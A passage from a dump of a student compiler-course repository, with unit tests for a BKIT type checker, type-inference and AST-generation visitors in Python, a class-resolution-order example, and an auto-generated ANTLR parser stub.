test_488(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x,y\n Body: \n Do \n Return main(x,y);\n While True\n EndDo.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(CallExpr(Id(\"main\"),[Id(\"x\"),Id(\"y\")]))))\n self.assertTrue(TestChecker.test(input,expect,488))\n \n def test_489(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:a;\n Function: main \n Parameter: n\n Body: \n Do\n Return a+3;\n While True\n EndDo.\n Return a *. 10.e2;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"*.\",Id(\"a\"),FloatLiteral(1000.0))))\n self.assertTrue(TestChecker.test(input,expect,489))\n \n def test_490(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x,y\n Body: \n Return main(x +3,y +. 10.2);\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(CallExpr(Id(\"main\"),[BinaryOp(\"+\",Id(\"x\"),IntLiteral(3)),BinaryOp(\"+.\",Id(\"y\"),FloatLiteral(10.2))]))))\n self.assertTrue(TestChecker.test(input,expect,490))\n \n def test_491(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter:a\n Body: \n a=1;\n foo(a,3*7, a+ 5,\"string\",True);\n EndBody.\n Function: foo \n Parameter: a,b,c,d,e\n Body: \n Var:z;\n a=4;\n b=21;\n c=6;\n d=\"Hello\";\n z= !e;\n a = (b==c) && !d;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(UnaryOp(\"!\",Id(\"d\"))))\n self.assertTrue(TestChecker.test(input,expect,491))\n \n def test_492(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: a,b,c\n Body: \n a= (a==b)!= c +3;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"!=\",BinaryOp(\"==\",Id(\"a\"),Id(\"b\")),BinaryOp(\"+\",Id(\"c\"),IntLiteral(3)))))\n self.assertTrue(TestChecker.test(input,expect,492))\n \n def test_493(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n If n == 0 Then\n If n!=0 Then\n If n!=0 Then\n a=5;\n EndIf.\n EndIf.\n EndIf.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"a\"))\n self.assertTrue(TestChecker.test(input,expect,493))\n \n def test_494(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: x;\n Function: main \n Parameter: x[5]\n Body:\n x = {1.,2.,3.,4.,5.};\n EndBody.\n Function: foo\n Body:\n x = 2;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,494))\n\n def test_495(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function : print\n Parameter : x\n Body:\n Return;\n EndBody.\n\n Function: m\n Body:\n Var : value = 12345;\n Return value;\n EndBody.\n\n Function: main\n Parameter : x, y\n Body: \n print(m); \n Return 0;\n EndBody.\n \"\"\"\n expect = str(Redeclared(Function(),\"print\"))\n self.assertTrue(TestChecker.test(input,expect,495))\n\n def test_496(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \n Parameter: x[5]\n Body:\n Var: y[5]; \n x = {1,2,3,4,5};\n main(y);\n foo(1.2);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 2;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),IntLiteral(2))))\n self.assertTrue(TestChecker.test(input,expect,496))\n\n def test_497(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \n Parameter: x[5]\n Body:\n Var: y[5]; \n x = {1,2,3,4,5};\n main(y); \n y = {1.,2.,3.,4.,5.};\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),ArrayLiteral([FloatLiteral(1.0),FloatLiteral(2.0),FloatLiteral(3.0),FloatLiteral(4.0),FloatLiteral(5.0)]))))\n self.assertTrue(TestChecker.test(input,expect,497))\n\n def test_498(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \n Parameter: x[5]\n Body:\n Var: y = 1; \n x = {1,2,3,4,5};\n main(y); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[Id(\"y\")])))\n self.assertTrue(TestChecker.test(input,expect,498))\n\n def test_499(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main \nBody:\n Var: a=1,x; \n a=foo(x); \nEndBody. \n \"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,499))\n\n def test_500(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\nFunction: main\n Parameter: x\n Body:\n If True Then\n Var: x = 1;\n main(1.5);\n EndIf.\n main(2);\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[IntLiteral(2)])))\n self.assertTrue(TestChecker.test(input,expect,500))\n def test_case_90(self):\n input = \"\"\"\n Var: x, a[10], b[5];\n Function: main\n Parameter: x\n Body:\n Do\n printStrLn(b[2]);\n While f()[2] EndDo.\n EndBody.\n Function: f\n Body:\n b[1] = \"dasd\";\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Dowhile(([],[CallStmt(Id('printStrLn'),[ArrayCell(Id('b'),[IntLiteral(2)])])]),ArrayCell(CallExpr(Id('f'),[]),[IntLiteral(2)]))))\n self.assertTrue(TestChecker.test(input, expect, 489))" }, { "alpha_fraction": 0.4632001519203186, "alphanum_fraction": 0.46836167573928833, "avg_line_length": 35.52447509765625, "blob_id": "fb8e932d1e08b6d6b5828ea013129032cd79c416", "content_id": "0ef9794996b3dfe7c181e9cc25f4cd7bff68cb66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5231, "license_type": "no_license", "max_line_length": 91, "num_lines": 143, "path": "/type/Q3_1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\n\nclass StaticCheck(Visitor):\n def visitProgram(self,ctx:Program,o:object):\n o = {}\n env = reduce(lambda x, y: dict(y.accept(self, x).items() | x.items()), ctx.decl, o)\n stmts = reduce(lambda x, y: y.accept(self, x), ctx.stmts, env)\n\n def visitVarDecl(self,ctx:VarDecl,o:object):\n return {ctx.name: None}\n \n def visitAssign(self,ctx:Assign,o):\n rhs_type = ctx.rhs.accept(self, o)\n lhs_type = ctx.lhs.accept(self, o)\n \n if None == rhs_type:\n raise TypeCannotBeInferred(ctx)\n \n if None != rhs_type and None == lhs_type:\n o[ctx.lhs.name] = rhs_type\n lhs_type = rhs_type\n \n if rhs_type != lhs_type:\n raise TypeMismatchInStatement(ctx)\n \n return o\n \n def visitId(self, ctx, o):\n if ctx.name not in o:\n raise UndeclaredIdentifier(ctx.name)\n return o[ctx.name]\n \n def visitBinOp(self,ctx:BinOp,o):\n type1 = ctx.e1.accept(self, o)\n type2 = ctx.e2.accept(self, o)\n join_type = set([type1, type2])\n \n if (ctx.op == '+' or ctx.op == '-' or ctx.op == '*' or ctx.op == '/'):\n if 'float' in join_type or 'bool' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'int'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'int'})\n return ctx.accept(self, o)\n return 'int'\n \n elif (ctx.op == '+.' or ctx.op == '-.' or ctx.op == '*.' or ctx.op == '/.'):\n if 'int' in join_type or 'bool' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'float'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'float'})\n return ctx.accept(self, o)\n return 'float'\n \n elif (ctx.op == '>' or ctx.op == '='):\n if 'float' in join_type or 'bool' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'int'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'int'})\n return ctx.accept(self, o)\n return 'bool'\n \n elif (ctx.op == '>.' or ctx.op == '=.'):\n if 'bool' in join_type or 'int' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'float'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'float'})\n return ctx.accept(self, o)\n return 'bool'\n \n elif (ctx.op == '&&' or ctx.op == '||' or ctx.op == '>b' or ctx.op == '=b'):\n if 'float' in join_type or 'int' in join_type:\n raise TypeMismatchInExpression(ctx)\n if type1 == None:\n o.update({ctx.e1.name: 'bool'})\n return ctx.accept(self, o)\n if type2 == None:\n o.update({ctx.e2.name: 'bool'})\n return ctx.accept(self, o)\n return 'bool'\n\n def visitUnOp(self,ctx:UnOp,o):\n join_type = ctx.e.accept(self, o)\n \n if (ctx.op == '!'):\n if 'float' == join_type or 'int' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'bool'})\n return ctx.accept(self, o)\n return 'bool'\n \n elif (ctx.op == '-'):\n if 'float' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'int'})\n return ctx.accept(self, o)\n return 'int'\n \n elif (ctx.op == '-.'):\n if 'int' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'float'})\n return ctx.accept(self, o)\n return 'float'\n \n elif (ctx.op == 'i2f'):\n if 'float' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'int'})\n return ctx.accept(self, o)\n return 'float'\n \n elif (ctx.op == 'floor'):\n if 'int' == join_type or 'bool' == join_type:\n raise TypeMismatchInExpression(ctx)\n if join_type == None:\n o.update({ctx.e.name: 'float'})\n return ctx.accept(self, o)\n return 'int'\n\n def visitIntLit(self,ctx:IntLit,o):\n return 'int'\n\n def visitFloatLit(self,ctx,o):\n return 'float'\n\n def visitBoolLit(self,ctx,o):\n return 'bool'\n " }, { "alpha_fraction": 0.6341699957847595, "alphanum_fraction": 0.6414381265640259, "avg_line_length": 41.048980712890625, "blob_id": "d14dadb90e8a0678ac57a60a857c7242e2ad6ab8", "content_id": "bc4ec58d99301278df995f61bf8215194857896b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10319, "license_type": "no_license", "max_line_length": 128, "num_lines": 245, "path": "/Assignments/assignment2/src1.0/main/bkit/astgen/ASTGeneration.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\nfrom functools import reduce\n\nclass ASTGeneration(BKITVisitor):\n\n def visitProgram(self,ctx:BKITParser.ProgramContext):\n var_decls = list(reduce(lambda y,x: y + self.visitVar_declare(x), [item for item in ctx.var_declare()], []))\n funcs_decls = list(reduce(lambda y,x: y + self.visitFunction_declare(x), [item for item in ctx.function_declare()], []))\n return Program(var_decls + funcs_decls)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n funcName = Id(ctx.ID().getText())\n params = self.visitParams_list(ctx.params_list())\n declare = list(reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), []))\n stmt = list(reduce(lambda y, x: y + self.visitStmt(x), ctx.stmt(), []))\n return [FuncDecl(funcName, params, tuple((declare,stmt)))]\n\n\n # Visit a parse tree produced by BKITParser#primitive_data.\n def visitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n if ctx.INT_LIT():\n return IntLiteral(int(ctx.INT_LIT().getText()))\n if ctx.FLOAT_LIT():\n return FloatLiteral(float(ctx.FLOAT_LIT().getText()))\n if ctx.STRING_LIT():\n return StringLiteral(str(ctx.STRING_LIT().getText()))\n if ctx.BOOL_LIT():\n return BooleanLiteral(bool(ctx.BOOL_LIT().getText()))\n\n\n # Visit a parse tree produced by BKITParser#array_lit.\n def visitArray_lit(self, ctx:BKITParser.Array_litContext):\n if ctx.primitive_data():\n return ArrayLiteral(list(map(lambda datum: self.visitPrimitive_data(datum), ctx.primitive_data())))\n else:\n return ArrayLiteral(list(map(lambda datum: self.visitArray_lit(datum), ctx.array_lit())))\n\n\n # Visit a parse tree produced by BKITParser#var_list.\n def visitVar_list(self, ctx:BKITParser.Var_listContext):\n var_non_init = list(map(lambda decl: self.visitVar_non_init(decl), ctx.var_non_init()))\n var_init = list(map(lambda decl: self.visitVar_init(decl), ctx.var_init()))\n return var_non_init + var_init\n\n # Visit a parse tree produced by BKITParser#var_non_init.\n def visitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n if ctx.getChildCount() == 1:\n decl = VarDecl(Id(ctx.ID().getText()), [], None)\n if isinstance(decl, VarDecl):\n return decl\n else:\n dim = map(lambda x: int(x), [lit.getText() for lit in ctx.INT_LIT()])\n decl = VarDecl(Id(ctx.ID().getText()), dim, None)\n if isinstance(decl, VarDecl):\n return decl\n\n\n # Visit a parse tree produced by BKITParser#var_init.\n def visitVar_init(self, ctx:BKITParser.Var_initContext):\n if ctx.LEFT_BRACKET():\n dim = map(lambda x: int(x), [lit.getText() for lit in ctx.INT_LIT()])\n decl = VarDecl(Id(ctx.ID().getText()), dim, self.visitArray_lit(ctx.array_lit()))\n if isinstance(decl, VarDecl):\n return decl\n else:\n decl = VarDecl(Id(ctx.ID().getText()), [], self.visitPrimitive_data(ctx.primitive_data()))\n if isinstance(decl, VarDecl):\n return decl\n\n\n # Visit a parse tree produced by BKITParser#params_list.\n def visitParams_list(self, ctx:BKITParser.Params_listContext):\n params_list = [self.visitVar_non_init(x) for x in ctx.var_non_init()]\n return params_list\n\n\n # Visit a parse tree produced by BKITParser#stmt_list.\n def visitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n declare = reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), [])\n stmt = reduce(lambda y, x: y + self.visitStmt(x), ctx.stmt(), [])\n return list(declare), list(stmt)\n\n\n # Visit a parse tree produced by BKITParser#if_stmt.\n def visitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n if_then_stmt = []\n else_stmt = []\n num_of_expr = len(ctx.expr())\n for idx in range(num_of_expr):\n expr = self.visitExpr(ctx.expr(idx))\n if ctx.stmt_list(idx):\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(idx))\n else:\n var_decls, stmt_list = [], []\n if_then_stmt += [tuple((expr, var_decls, stmt_list))]\n else_stmt = tuple(())\n if ctx.ELSE():\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(num_of_expr))\n else_stmt = tuple(var_decls, stmt_list)\n return [If(if_then_stmt, else_stmt)]\n\n\n # Visit a parse tree produced by BKITParser#for_stmt.\n def visitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n iter_var = ctx.ID().getText()\n expr1 = self.visitExpr(ctx.expr(0))\n expr2 = self.visitExpr(ctx.expr(1))\n expr3 = self.visitExpr(ctx.expr(2))\n loop = tuple(self.visitStmt_list(ctx.stmt_list()))\n return [For(iter_var, expr1, expr2, expr3, loop)]\n\n # Visit a parse tree produced by BKITParser#while_stmt.\n def visitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = self.visitStmt_list(tuple(ctx.stmt_list()))\n return [While(expr, sl)]\n\n\n # Visit a parse tree produced by BKITParser#dowhile_stmt.\n def visitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = self.visitStmt_list(tuple(ctx.stmt_list()))\n return [DoWhile(sl, expr)]\n\n # Visit a parse tree produced by BKITParser#composite_var.\n def visitComposite_var(self, ctx:BKITParser.Composite_varContext):\n return ArrayCell(Id(ctx.ID().getText()), self.visitExpr(ctx.expr()))\n\n\n # Visit a parse tree produced by BKITParser#assign_stmt\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n lhs = Id(ctx.ID().getText()) if ctx.ID() else self.visitComposite_var(ctx.composite_var())\n rhs = self.visitExpr(ctx.expr())\n return [AssignStmt(lhs, rhs)]\n\n\n # Visit a parse tree produced by BKITParser#break_stmt.\n def visitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n return [Break()]\n\n\n # Visit a parse tree produced by BKITParser#continue_stmt.\n def visitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n return [Continue()]\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n return self.visitFunction_call(ctx)\n\n\n # Visit a parse tree produced by BKITParser#return_stmt.\n def visitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n return Return(self.visitExpr(ctx.expr()))\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n if ctx.REL_OP():\n return BinaryOp(ctx.REL_OP().getText(), self.visitExpr1(ctx.expr1(0)), self.visitExpr1(ctx.expr1(1)))\n return self.visitExpr1(ctx.expr1(0))\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n if ctx.BIN_LOGICAL_OP():\n return BinaryOp(ctx.BIN_LOGICAL_OP().getText(), self.visitExpr1(ctx.expr1()), self.visitExpr2(ctx.expr2()))\n return self.visitExpr2(ctx.expr2())\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n if ctx.ADD_OP():\n return BinaryOp(ctx.ADD_OP().getText(), self.visitExpr2(ctx.expr2()), self.visitExpr3(ctx.expr3()))\n return self.visitExpr3(ctx.expr3())\n\n\n # Visit a parse tree produced by BKITParser#expr3.\n def visitExpr3(self, ctx:BKITParser.Expr3Context):\n if ctx.MUL_OP():\n return BinaryOp(ctx.MUL_OP().getText(), self.visitExpr3(ctx.expr3()), self.visitExpr4(ctx.expr4()))\n return self.visitExpr4(ctx.expr4())\n\n\n # Visit a parse tree produced by BKITParser#expr4.\n def visitExpr4(self, ctx:BKITParser.Expr4Context):\n if ctx.UN_LOGICAL_OP():\n return UnaryOp(ctx.UN_LOGICAL_OP().getText(), self.visitExpr4(ctx.expr4()))\n return self.visitExpr5(ctx.expr5())\n\n\n # Visit a parse tree produced by BKITParser#expr5.\n def visitExpr5(self, ctx:BKITParser.Expr5Context):\n if ctx.UN_OP():\n return UnaryOp(ctx.UN_OP().getText(), self.visitExpr5(ctx.expr5()))\n return self.visitExpr6(ctx.expr6())\n\n\n # Visit a parse tree produced by BKITParser#expr6.\n def visitExpr6(self, ctx:BKITParser.Expr6Context):\n if ctx.index_op():\n return BinaryOp(str('[]'), self.visitExpr7(ctx.expr7(), self.visitIndex_op(ctx.index_op())))\n return self.visitExpr7(ctx.expr7())\n\n\n # Visit a parse tree produced by BKITParser#expr7.\n def visitExpr7(self, ctx:BKITParser.Expr7Context):\n if ctx.function_call():\n return self.visitCall_stmt(ctx.function_call())\n return self.visitExpr8(ctx.expr8())\n\n # Visit a parse tree produced by BKITParser#expr8.\n def visitExpr8(self, ctx:BKITParser.Expr8Context):\n if ctx.operand():\n return self.visitOperand(ctx.operand())\n if ctx.LEFT_PAREN:\n return self.visitExpr(ctx.expr())\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n if ctx.var_non_init():\n return self.visitVar_non_init(ctx.var_non_init())\n if ctx.primitive_data():\n return self.visitPrimitive_data(ctx.primitive_data())\n if ctx.array_lit():\n return self.visitArray_lit(ctx.array_lit())\n\n\n\n # Visit a parse tree produced by BKITParser#function_call.\n def visitFunction_call(self, ctx:BKITParser.Function_callContext):\n if ctx.expr():\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return CallStmt(ctx.ID(), expr_list)\n\n\n # Visit a parse tree produced by BKITParser#index_op.\n def visitIndex_op(self, ctx:BKITParser.Index_opContext):\n if ctx.index_op():\n return UnaryOp('[]', self.visitIndex_op(ctx.index_op()))\n else:\n return UnaryOp('[]', self.visitExpr(ctx.expr()))\n \n " }, { "alpha_fraction": 0.519336998462677, "alphanum_fraction": 0.519336998462677, "avg_line_length": 12.961538314819336, "blob_id": "8baca60f9e4c1a8fe52e6dab4bb85cc94545081d", "content_id": "f59b49efb45c8f7899361e077ec41c8960128934", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 86, "num_lines": 26, "path": "/OOP/Question1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class O: \n pass\n\nclass A(O): \n def foo(self): \n print('in A')\n\nclass C(O):\n def foo(self):\n print('in C')\n\nclass B(O):\n pass\n\nclass D(B, A):\n pass\n\nclass E(C, A):\n pass\n\nclass F(E, D, B):\n pass\n\nif __name__ == '__main__':\n print(F.mro())\n F().foo() # invoked C because C appears before A in class resolutions of mro algo" }, { "alpha_fraction": 0.4729119539260864, "alphanum_fraction": 0.5103461146354675, "avg_line_length": 29.69942283630371, "blob_id": "d41d0fc4944f92386331f4836f1c881e7b09edcc", "content_id": "ea20ec571de0a26d1609885af9df2af4ddacf33b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5316, "license_type": "no_license", "max_line_length": 103, "num_lines": 173, "path": "/SyntaxAnalysis/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3D\")\n buf.write(\"\\7\\4\\2\\t\\2\\3\\2\\3\\2\\3\\2\\2\\2\\3\\2\\2\\2\\2\\5\\2\\4\\3\\2\\2\\2\\4\\5\")\n buf.write(\"\\3\\2\\2\\2\\5\\3\\3\\2\\2\\2\\2\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \n \"'Else'\", \"'ElSelf'\", \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \n \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \n \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \n \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \n \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \n \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\" ]\n\n symbolicNames = [ \"<INVALID>\", \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n RULE_program = 0\n\n ruleNames = [ \"program\" ]\n\n EOF = Token.EOF\n REAL_NUMBER=1\n ID=2\n ILLEGAL_ESCAPE=3\n UNCLOSE_STRING=4\n COMMENT=5\n UNTERMINATED_COMMENT=6\n ERROR_CHAR=7\n WS=8\n Integer_literal=9\n Float_literal=10\n Boolean_literal=11\n String_literal=12\n BODY=13\n BREAK=14\n CONTINUE=15\n DO=16\n ELSE=17\n ELSELF=18\n ELSEIF=19\n ENDBODY=20\n ENDFOR=21\n ENDWHILE=22\n FOR=23\n FUNCTION=24\n IF=25\n PARAMETER=26\n RETURN=27\n THEN=28\n VAR=29\n WHILE=30\n TRUE=31\n FALSE=32\n ENDDO=33\n PLUS_INT=34\n PLUS_FLOAT=35\n MINUS_INT=36\n MINUS_FLOAT=37\n STAR_INT=38\n STAR_FLOAT=39\n DIV_INT=40\n DIV_FLOAT=41\n MOD=42\n NOT=43\n AND=44\n OR=45\n EQUAL=46\n NOT_EQUAL_INT=47\n LESS_INT=48\n GREATER_INT=49\n LESS_OR_EQUAL_INT=50\n GREATER_OR_EQUAL_INT=51\n NOT_EQUAL_FLOAT=52\n LESS_FLOAT=53\n GREATER_FLOAT=54\n LESS_OR_EQUAL_FLOAT=55\n GREATER_OR_EQUAL_FLOAT=56\n LEFT_PAREN=57\n RIGHT_PARENT=58\n LEFT_BRACKET=59\n RIGHT_BRACKET=60\n LEFT_BRACE=61\n RIGHT_BRACE=62\n COLON=63\n DOT=64\n SEMI=65\n COMMA=66\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.46404793858528137, "alphanum_fraction": 0.4833555221557617, "avg_line_length": 25.36842155456543, "blob_id": "cdb5dbb79ba7909b4ad42a436a990e58b551b460", "content_id": "a3d925bd145fc80a555e80b40bbde89751893482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1502, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/type/Q1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Exp(ABC): pass #abstract class\n\nclass BinOp(Exp): pass #op:str,e1:Exp,e2:Exp #op is +,-,*,/,&&,||, >, <, ==, or !=\n\nclass UnOp(Exp): pass #op:str,e:Exp #op is -, !\n\nclass IntLit(Exp): pass #val:int\n\nclass FloatLit(Exp): pass #val:float\n\nclass BoolLit(Exp): pass #val:bool\n\nclass StaticCheck(Visitor):\n\n def visitBinOp(self,ctx:BinOp,o):\n e1 = self.visit(ctx.e1, o)\n e2 = self.visit(ctx.e2, o)\n if ctx.op in ['+', '-', '*']:\n if e1*e2 == 0:\n raise TypeMismatchInExpression(ctx)\n if e1*e2 < 0:\n return -1\n else:\n return 1\n if ctx.op in ['/']:\n if e1*e2 == 0:\n raise TypeMismatchInExpression(ctx)\n return -1\n \n if ctx.op in ['&&', '||']:\n if (e1 + e2):\n raise TypeMismatchInExpression(ctx)\n return 0\n else:\n if e1 != e2:\n raise TypeMismatchInExpression(ctx)\n return 0\n\n def visitUnOp(self,ctx:UnOp,o):\n e = self.visit(ctx.e, o)\n if ctx.op in ['-']:\n if e == 0:\n raise TypeMismatchInExpression(ctx)\n return e\n if ctx.op in ['!']:\n if e != 